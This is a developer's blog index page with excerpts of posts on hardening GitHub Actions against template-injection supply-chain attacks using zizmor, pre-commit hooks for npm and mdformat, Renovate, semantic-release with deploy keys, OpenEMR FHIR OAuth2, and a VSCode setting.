Skip to content

Blog

Harden your GitHub Actions Workflows with zizmor, dependency pinning, and dependency cooldowns

It's been a crazy week (or weeks?) for a lot of people with several supply chain attacks. They all seem to have originated from the compromise of trivy (ironically, trivy is a security scanner). I wanted to understand how they initially gained access to the secrets used in their GitHub organization and found that there was an earlier attack that targeted GitHub Actions workflows of open source projects.

Looking at the details of how the secrets were extracted I noticed that they all used similar techniques. And, unless I missed something, it is through template injection and unsafe pull_request_target triggers. This could be avoided because all of those vulnerabilities (and more) can be found by zizmor, a static analysis tool for GitHub Actions!

The problem is that, unfortunately, GitHub Actions is NOT secure by default1. One would think that when following the official documentation you end up with workflows that are secure and can not be exploited. Last year, I came across zizmor and upon checking my workflows it pointed out several problems that I was quite surprised to find out about.

Of course, GitHub should make Actions more secure by default2. And it seems that the latest attacks have finally helped to make some progress in that direction. GitHub have published a security roadmap for GitHub Actions and are looking for feedback from the community.

Until that happens, what can you do right now to harden your GitHub Actions workflows?

Run npm ci as a pre-commit hook

This week I was updating a dependency in a node-based repository and several times forgot to commit the changes to package-lock.json as well.

The CI pipeline failed each time because it runs npm ci to ensure that the lock file is up to date.

I wondered whether I could catch this problem locally at commit-time via a pre-commit hook.

.pre-commit-config.yaml
repos:
  - repo: local
    hooks:
      - id: npm-ci
        name: npm lockfile up to date
        language: node
        entry: npm ci --dry-run
        files: ^package(-lock)?\.json$

Actually, seeing this now makes me realize that --dry-run is unnecessary. This way, the lock file gets modified (if it wasn't) and you can stage it for your commit.

Now, the CI job that runs pre-commit hooks via prek failed because the system node version is used by default. At the time of this writing it has v20 installed whereas our packages require v22 or even v24. There is a language_version property, however, since npm ci is already run in a job to actually install the dependencies. So in the end, this hook is skipped in CI.

Updating pre-commit additional dependencies using Renovate

I am a huge fan of Renovate Bot to automatically update dependencies in projects. I use it in all my projects. At the time when I discovered it, we were using GitLab so we could not use dependabot.

In general, I quickly realized that Renovate Bot has significant advantages over dependabot (which, if I am not mistaken, is restricted to running on GitHub). Renovate is fully open source (and can be self-hosted), highly configurable, supports many dependency managers, supports custom managers with regex, and much more.

Renovate has been having beta pre-commit support for quite some time which needs to be enabled explicitly. I have been using it for a while and it works great in keeping up-to-date with updates to pre-commit hooks (it is generally recommended to pin dependencies).

pre-commit hooks can have additional dependencies. These additional dependencies are specific to the language the hook uses. For example, let's assume you are using mdformat to format your Markdown files which supports additional plugins. mdformat is a Python tool so the additional dependencies are Python packages.

Here is an example pre-commit config that this website uses as of this writing:

.pre-commit-config.yaml (excerpt)
  - repo: https://github.com/executablebooks/mdformat
    rev: 1.0.0
    hooks:
      - id: mdformat
        language: python
        args: [--number, --sort-front-matter, --strict-front-matter]
        additional_dependencies:
          - mdformat-mkdocs==5.1.4
          - mdformat-front-matters==2.0.0
          - mdformat-footnote==0.1.3
          - mdformat-gfm-alerts==2.0.0
          - mdformat-ruff==0.1.3
          - ruff==0.15.4
          - mdformat-config==0.2.1
  1. Specifying the language is optional but important here as you will see when you keep reading.

How can we ensure that the additional dependencies receive get updated automatically as well?

Using semantic-release with an SSH deploy key in GitHub Actions

We use semantic-release to release new versions of one of our JavaScript-based web applications. semantic-release can help with various release-based activities, such as figuring out the version bump based on the commit history using conventional commits, updating the changelog, pushing a new version tag, and so on.

We recently migrated our repositories to GitHub and have a ruleset enabled for the main (default) branch to protect this branch. Using a ruleset is basically the new way of protecting a branch. For a single developer or a very small team this might be overkill and slow you down. For bigger teams definitely it makes sense to ensure that certain practices are adhered to. For example, you can enforce that force pushes are getting blocked, or that a pull request is required before merging.

This is where we ran into issues where the release commit by semantic-release could not be pushed directly to main due to this rule. GitHub allows you to grant bypass permissions for your ruleset. Unfortunately, you cannot add a single user to this bypass list, and the GITHUB_TOKEN secret is associated with the (special) github-actions[bot] user.

So, how were we able to accomplish this?

Authenticating as a system user with OpenEMR's FHIR API using OAuth2

At Opal we want to support the current industry standard in healthcare integration which is SMART on FHIR. This also makes sense given that Opal has a partnership with OpenEMR which supports this standard.

In this article I describe how to authenticate a backend service using the client_credentials grant in Python in two different ways (i.e., with two different packages). For example, this is required when making use of the Bulk Export API.

Formatting Markdown files with mdformat

At some point I was looking at the .pre-commit-config.yaml that the ruff project uses. Looking at how other projects do things, what tools they use, how they work, etc. is a great way to learn. I noticed several pre-commit hooks that were interesting, one of which was mdformat.

mdformat is "an opionionated Markdown formatter". It has a specific formatting style that cannot be configured. There are a few configuration options though.

The nice thing is that it has a plugin system giving you the ability to add support for syntax other than what is defined by CommonMark. In addition, there is also support for code formatter plugins to format code in fenced code blocks.

For example, for a project that uses mkdocs with the fantastic mkdocs-material theme (like this website uses), the mdformat-mkdocs plugin offers the necessary support. You can find the see the setup that this website uses in the corresponding .pre-commit-config.yaml.

Compatibility with markdownlint

I have been using markdownlint for a while. Since both tools support CommonMark they are basically compatible.

I run both tools via pre-commit hooks. First, mdformat, and then markdownlint-cli2 so that the linting is done on an already formatted file.

The one thing that does not work, unfortunately, is when you use a comment to disable a certain markdownlint rule for the next line. mdformat adds an empty line in between the comment and the next line invalidating disabling the rule.

Stopping VSCode Python Extension from Changing your Terminal Environment

I have tripped over an outdated environment variable a few times when running Python from within vscode. And I finally figured out what caused it.

We store our environment variables in a .env file that is then used by our Django application. We use the django-environ package for this. During development, this file is loaded on startup. When deployed, we provide the file via env_file in the compose file.

What happened in vscode is that when a value in .env changed, running something, such as pytest, would not see this new environment variable value.

After a while I noticed that there was a yellow warning sign next to the terminal process. When hovering over it it asks you to relaunch the terminal because the environment changed. It took me a long time to figure this out in the first place. It's not something I expected and not very intuitive.

I had looked in the past in the settings where this is coming from and how this can be disabled and could not find anything. Today I finally figured it out, after running into this issue again and wasting time until I realized why something did not work.

The popup shown when hovering over the allows you to "Show Environment Contributions". The Python VSCode extension contributed the variables and causes this behaviour. In Settings > Extensions > Python there is an entry called "Env File" that contains ${workspaceFolder}/.env. Remove the value and relaunch the terminal.

Now changes to your .env file won't affect your terminal's environment anymore.

Blog Relaunched

My blog has existed since 2011. The intent has always been to share knowledge I gained, whether this be for someone else, or just for my future self. From the beginning I used Wordpress which makes it quite easy to set up a blog. There are also tons of themes and plugins that you can install and use.

Writing (especially in public) is not super natural for me. Doing it in WordPress did not feel natural to me either. So for a while I was dredding to create new blog posts because it was too cumbersome for me multiple reasons.

Another difficulty was keeping WordPress up to date along with the plugins and any customizations to it. While it is fairly easy to customize CSS, JS, or the PHP code of themes and plugins, there is no easy way to keep those separate so that themes and plugins can be easily updated.

I switched to a containerized setup, putting as much as possible in a repository. This included customizations. My idea was that it would be easier to update themes and plugins and re-apply those customizations. In the end, it was still too much manual work, however. It's not as easy as merging a dependency update on your repository raised by Renovate (of which I am a huge fan) and automatically re-deploying.

A few years ago, I came across the amazing Material for MkDocs. It is a technical documentation theme for MkDocs with many great features. Documentation is written in Markdown and can be version controlled in a repository. This is basically "documentation as code".

I first introduced it at work a few years ago for various documentation sites. Together with Material for MkDocs this has been fantastic.

Since Material for MkDocs has a blog plugin I've been wanting to switch to this for a while. I knew that this will allow me to write blog posts more naturally (in a text editor) and treat everything as code. I finally got around to it and migrated my old WordPress site to what is now a static site.

It is live now 😄.

Keep reading if you are interested in the details of how it is set up.